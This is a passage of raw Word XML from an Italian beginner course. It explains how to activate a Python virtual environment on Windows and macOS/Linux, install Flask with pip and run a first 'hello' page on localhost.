        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">venv</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(il secondo) → il nome della cartella che vogliamo creare per l’ambiente virtuale. Per convenzione si chiama anch’essa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">venv</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Aspetta qualche secondo. Vedrai apparire nella barra laterale una nuova cartella</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">venv</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">con dentro tante sottocartelle.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Non toccare niente lì dentro.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">È gestita automaticamente.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="42"/>
    <w:bookmarkStart w:id="43" w:name="attivare-lambiente-virtuale"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Attivare l’ambiente virtuale</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Crearlo non basta: bisogna</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">attivarlo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, cioè dire al terminale</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">da adesso in poi, quando dico</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">‘</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">python</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">o</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">‘</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">pip</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, usa quelli di questo ambiente, non quelli del sistema</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Su Windows (PowerShell):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.\venv\Scripts\Activate.ps1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">⚠️</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Possibile errore su Windows:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">se vedi un messaggio rosso che parla di</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">l’esecuzione di script è disabilitata su questo sistema</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, è una protezione di Windows. Esegui una volta sola questo comando per disattivarla per il tuo utente:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ti chiederà conferma: scrivi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">S</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(sì) e premi Invio. Poi riprova ad attivare l’ambiente.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Su macOS / Linux:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">source venv/bin/activate</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="43"/>
    <w:bookmarkStart w:id="44" w:name="come-capisci-che-è-attivo"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Come capisci che è attivo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Una volta attivato, il prompt del terminale cambia: davanti compare</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">(venv)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Per esempio:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">(venv) PS C:\Users\TuoNome\Documents\corso-sicurezza&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Quel</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">(venv)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">davanti è il segnale che sei dentro l’ambiente.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Da qui in avanti, ogni volta che apri il terminale per lavorare al corso, ricordati di attivare l’ambiente virtuale.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Se vedi che</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">(venv)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">non c’è, riattivalo.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Per</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">disattivarlo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(raramente necessario): digita</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">deactivate</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e premi Invio.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="44"/>
    <w:bookmarkEnd w:id="45"/>
    <w:bookmarkStart w:id="52" w:name="X0d6efa1dc6ad53969a9e640226991c4eab3092c"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="446" w:name="sec_0_8"/>
      <w:r>
        <w:t xml:space="preserve">0.8 Installare Flask e fare la prima pagina web</w:t>
      </w:r>
      <w:bookmarkEnd w:id="446"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Adesso che hai l’ambiente virtuale attivo, installa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Flask</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, il framework che useremo per costruire applicazioni web.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="46" w:name="cosè-pip"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cos’è pip</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pip</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">è il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">gestore di pacchetti</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">di Python: è il programma che scarica e installa le librerie. È incluso automaticamente quando installi Python.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="46"/>
    <w:bookmarkStart w:id="47" w:name="installare-flask"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Installare Flask</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Con l’ambiente virtuale attivo, digita:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pip install flask</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Premi Invio. Vedrai scorrere righe di download (per qualche secondo). Alla fine deve apparire qualcosa tipo:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Successfully installed Flask-3.x.x ...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">(insieme a Flask vengono installate altre piccole librerie da cui dipende — è normale).</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="47"/>
    <w:bookmarkStart w:id="48" w:name="verifica-installazione"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Verifica installazione</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Per essere sicuro:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pip list</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vedrai una lista di pacchetti installati nell’ambiente virtuale. Tra questi deve comparire</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Flask</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(con la F maiuscola).</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="48"/>
    <w:bookmarkStart w:id="49" w:name="la-tua-prima-pagina-web"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La tua prima pagina web</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Crea un nuovo file in VS Code chiamato</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">primo_sito.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">dentro</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">corso-sicurezza</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, e scrivici:</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"&lt;h1&gt;Ciao, sono il mio primo sito!&lt;/h1&gt;"</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Spiegazione riga per riga (la sintassi diventerà familiare con la pratica):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1014"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">from flask import Flask</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">→ importa la classe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Flask</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">dalla libreria</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1014"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">app = Flask(__name__)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">→ crea un’applicazione web vuota</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1014"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">@app.route("/")</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">→</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">quando qualcuno visita la pagina iniziale (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), esegui la funzione qui sotto</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1014"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">def home():</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">→ definizione della funzione che gestisce quella pagina</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1014"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">return "..."</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">→ la funzione restituisce un pezzo di HTML che il browser mostrerà</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1014"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">app.run(debug=True)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">→ avvia il server web (la modalità</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">debug</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">mostra errori dettagliati durante lo sviluppo —</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">mai usarla in produzione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Salva il file. Nel terminale (sempre con</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">(venv)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">davanti):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">python primo_sito.py</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vedrai apparire qualcosa tipo:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> * Serving Flask app 'primo_sito'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> * Debug mode: on</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> * Running on </w:t>
      </w:r>
      <w:hyperlink r:id="rId31">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">http://127.0.0.1:5000</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L’ultima riga è la più importante: ti dice che il sito è</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">attivo all’indirizzo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId31">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:bCs/>
            <w:b/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">http://127.0.0.1:5000</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="49"/>
    <w:bookmarkStart w:id="50" w:name="aprire-il-sito-nel-browser"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Aprire il sito nel browser</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">127.0.0.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(chiamato anche</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">localhost</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) è un indirizzo speciale che significa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">questo computer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">:5000</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">è il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">port</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(porta) su cui Flask sta ascoltando.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Apri il browser e nella barra degli indirizzi digita:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:hyperlink r:id="rId31">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">http://127.0.0.1:5000</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Devi vedere a video una pagina con il titolo grosso</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Ciao, sono il mio primo sito!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">📷</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Screenshot:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">browser aperto su localhost:5000 con il messaggio</w:t>
      </w:r>
      <w:r>
